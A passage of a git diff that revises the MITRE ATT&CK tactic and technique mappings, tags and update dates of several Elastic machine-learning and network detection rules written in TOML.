"endpoint"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -82,68 +82,18 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "52afbdc5-db15-485e-bc24-f5707f820c4b" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/ml/ml_linux_anomalous_network_port_activity.toml b/rules/ml/ml_linux_anomalous_network_port_activity.toml index be92e900df7..58d52643cb3 100644 --- a/rules/ml/ml_linux_anomalous_network_port_activity.toml +++ b/rules/ml/ml_linux_anomalous_network_port_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -72,14 +72,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "3c7e32e6-6104-46d9-a06e-da0f8b5795a0" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis @@ -121,39 +114,12 @@ In Linux environments, network ports facilitate communication between applicatio [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique]] id = "T1571" name = "Non-Standard Port" reference = "https://attack.mitre.org/techniques/T1571/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/ml/ml_low_count_events_for_a_host_name.toml b/rules/ml/ml_low_count_events_for_a_host_name.toml index d2128f0bf36..caedf9aab62 100644 --- a/rules/ml/ml_low_count_events_for_a_host_name.toml +++ b/rules/ml/ml_low_count_events_for_a_host_name.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -92,28 +92,3 @@ Host-based traffic monitoring is crucial for identifying anomalies in network ac - Monitor network traffic for any signs of unusual activity or attempts to exploit the situation further. - Escalate the incident to the security operations team for a deeper forensic analysis and to determine if additional hosts are affected.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat.technique]] -id = "T1499" -name = "Endpoint Denial of Service" -reference = "https://attack.mitre.org/techniques/T1499/" diff --git a/rules/ml/ml_packetbeat_rare_server_domain.toml b/rules/ml/ml_packetbeat_rare_server_domain.toml index 21d0d1aac74..211e1efd87e 100644 --- a/rules/ml/ml_packetbeat_rare_server_domain.toml +++ b/rules/ml/ml_packetbeat_rare_server_domain.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -81,7 +81,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "17e68559-b274-4948-ad0b-f8415bb31126" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis @@ -121,42 +121,6 @@ Machine learning models analyze network traffic to identify atypical domain name [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" - -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" @@ -167,16 +131,12 @@ id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/ml/ml_rare_destination_country.toml b/rules/ml/ml_rare_destination_country.toml index 7c1f674b243..0cc3e8c8ee9 100644 --- a/rules/ml/ml_rare_destination_country.toml +++ b/rules/ml/ml_rare_destination_country.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -77,7 +77,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "35f86980-1fb1-4dff-b311-3be941549c8d" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Exfiltration", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis @@ -118,67 +118,25 @@ Machine learning models analyze network logs to identify traffic to uncommon des [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" - -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" -[[rule.threat.technique]] -id = "T1048" -name = "Exfiltration Over Alternative Protocol" -reference = "https://attack.mitre.org/techniques/T1048/" - +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/ml/ml_spike_in_traffic_to_a_country.toml b/rules/ml/ml_spike_in_traffic_to_a_country.toml index 9c9c130f549..a5cf353a99d 100644 --- a/rules/ml/ml_spike_in_traffic_to_a_country.toml +++ b/rules/ml/ml_spike_in_traffic_to_a_country.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -112,58 +112,44 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "c7db5533-ca2a-41f6-a8b0-ee98abe0f573" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Exfiltration", "Tactic: Reconnaissance", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - [[rule.threat.technique]] -id = "T1046" -name = "Network Service Discovery" -reference = "https://attack.mitre.org/techniques/T1046/" +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" - [[rule.threat.technique]] id = "T1595" name = "Active Scanning" reference = "https://attack.mitre.org/techniques/T1595/" +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/ml/ml_windows_anomalous_network_activity.toml b/rules/ml/ml_windows_anomalous_network_activity.toml index 3df432d3263..e2fb8c87705 100644 --- a/rules/ml/ml_windows_anomalous_network_activity.toml +++ b/rules/ml/ml_windows_anomalous_network_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -79,68 +79,31 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Exfiltration", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - diff --git a/rules/ml/persistence_ml_linux_anomalous_process_all_hosts.toml b/rules/ml/persistence_ml_linux_anomalous_process_all_hosts.toml index 3df45d5fb94..11b70e142fa 100644 --- a/rules/ml/persistence_ml_linux_anomalous_process_all_hosts.toml +++ b/rules/ml/persistence_ml_linux_anomalous_process_all_hosts.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2024/06/18" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -124,21 +124,3 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/ml/persistence_ml_rare_process_by_host_linux.toml b/rules/ml/persistence_ml_rare_process_by_host_linux.toml index 27b54cff337..cbda6deb409 100644 --- a/rules/ml/persistence_ml_rare_process_by_host_linux.toml +++ b/rules/ml/persistence_ml_rare_process_by_host_linux.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -114,31 +114,35 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "46f804f5-b289-43d6-a881-9387cf594f75" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Execution", "Tactic: Persistence", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/ml/persistence_ml_rare_process_by_host_windows.toml b/rules/ml/persistence_ml_rare_process_by_host_windows.toml index bea679b8ed2..c237bb227e6 100644 --- a/rules/ml/persistence_ml_rare_process_by_host_windows.toml +++ b/rules/ml/persistence_ml_rare_process_by_host_windows.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/02/27" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -168,21 +168,3 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/ml/persistence_ml_windows_anomalous_path_activity.toml b/rules/ml/persistence_ml_windows_anomalous_path_activity.toml index ce8453a6836..3ada406bbf5 100644 --- a/rules/ml/persistence_ml_windows_anomalous_path_activity.toml +++ b/rules/ml/persistence_ml_windows_anomalous_path_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -108,49 +108,22 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Persistence", - "Tactic: Execution", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Execution", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.003" -name = "Windows Service" -reference = "https://attack.mitre.org/techniques/T1543/003/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/ml/persistence_ml_windows_anomalous_process_all_hosts.toml b/rules/ml/persistence_ml_windows_anomalous_process_all_hosts.toml index f9ada397b67..250fbaa439f 100644 --- a/rules/ml/persistence_ml_windows_anomalous_process_all_hosts.toml +++ b/rules/ml/persistence_ml_windows_anomalous_process_all_hosts.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -169,33 +169,3 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/ml/persistence_ml_windows_anomalous_process_creation.toml b/rules/ml/persistence_ml_windows_anomalous_process_creation.toml index f498ba198b9..bf041396252 100644 --- a/rules/ml/persistence_ml_windows_anomalous_process_creation.toml +++ b/rules/ml/persistence_ml_windows_anomalous_process_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -161,26 +161,27 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Execution", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml b/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml index c41b0d62e61..b76ecf594fd 100644 --- a/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml +++ b/rules/ml/privilege_escalation_ml_linux_anomalous_sudo_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -122,26 +122,18 @@ Sudo is a command in Unix-like systems that allows permitted users to execute co - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.""" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml b/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml index 8485f372dbb..454ceb65ca1 100644 --- a/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml +++ b/rules/ml/privilege_escalation_ml_windows_rare_user_runas_event.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -119,8 +119,22 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.004" +name = "Elevated Execution with Prompt" +reference = "https://attack.mitre.org/techniques/T1548/004/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml b/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml index 8c04edd604d..3b0275cb450 100644 --- a/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml +++ b/rules/ml/resource_development_ml_linux_anomalous_compiler_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -121,21 +121,3 @@ Compilers transform source code into executable programs, a crucial step in soft - Restore the system from a known good backup if malicious code execution is confirmed, ensuring that the backup is free from compromise. - Implement stricter access controls and monitoring for compiler usage, ensuring only authorized users can execute compilers. - Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected.""" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1588" -name = "Obtain Capabilities" -reference = "https://attack.mitre.org/techniques/T1588/" -[[rule.threat.technique.subtechnique]] -id = "T1588.001" -name = "Malware" -reference = "https://attack.mitre.org/techniques/T1588/001/" - - - -[rule.threat.tactic] -id = "TA0042" -name = "Resource Development" -reference = "https://attack.mitre.org/tactics/TA0042/" - diff --git a/rules/network/command_and_control_accepted_default_telnet_port_connection.toml b/rules/network/command_and_control_accepted_default_telnet_port_connection.toml index e586f7519a8..284a87291a3 100644 --- a/rules/network/command_and_control_accepted_default_telnet_port_connection.toml +++ b/rules/network/command_and_control_accepted_default_telnet_port_connection.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["network_traffic", "panw", "fortinet_fortigate", "sonicwall_firewall", "suricata"] maturity = "production" -updated_date = "2026/02/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -73,18 +73,7 @@ Telnet, a protocol for remote command-line access, is often used in legacy syste risk_score = 47 rule_id = "34fde489-94b0-4500-a76f-b8a157cf9269" severity = "medium" -tags = [ - "Domain: Endpoint", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Tactic: Lateral Movement", - "Tactic: Initial Access", - "Data Source: PAN-OS", - "Data Source: Fortinet", - "Data Source: SonicWall", - "Data Source: Suricata", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: PAN-OS", "Data Source: Fortinet", "Data Source: SonicWall", "Data Source: Suricata", "Resources: Investigation Guide"] timeline_id = "300afc76-072d-4261-864d-4149714bf3f1" timeline_title = "Comprehensive Network Timeline" timestamp_override = "event.ingested" @@ -104,32 +93,25 @@ query = ''' [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0001" +name = "Initial Access" +reference = 